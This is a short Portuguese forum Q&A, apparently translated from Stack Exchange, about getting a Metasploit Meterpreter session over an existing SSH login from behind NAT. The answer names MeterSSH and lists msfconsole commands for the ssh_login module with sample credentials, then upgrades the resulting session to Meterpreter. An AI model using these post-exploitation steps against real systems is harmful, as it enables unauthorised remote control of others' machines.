Meterpreter na conexão ssh

0

Estou por trás do NAT.

Eu consigo fazer o login no ssh para o alvo.

Como usar metasploit / Enviar meterpreter sobre essa conexão SSH?

Eu tentei shell_to_meterpreter , mas ele falhou porque não consigo abrir minha porta para o TCP reverso se conectar.

Ambas as máquinas estão no linux.

    
por vfjpl 14.05.2018 / 14:32

1 resposta

0

Windows:

Você pode tentar usar MeterSSH .

MeterSSH é uma maneira fácil de injetar código shell nativo na memória e canalizar qualquer coisa sobre SSH para a máquina atacante através de um túnel SSH e tudo independente em um único arquivo Python.

Linux:

Você pode usar o módulo auxiliar do metasploit chamado ssh_login:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

Agora, converta o shell de comando no shell do meterpreter usando o seguinte comando

session –u 1
    
por 14.05.2018 / 14:42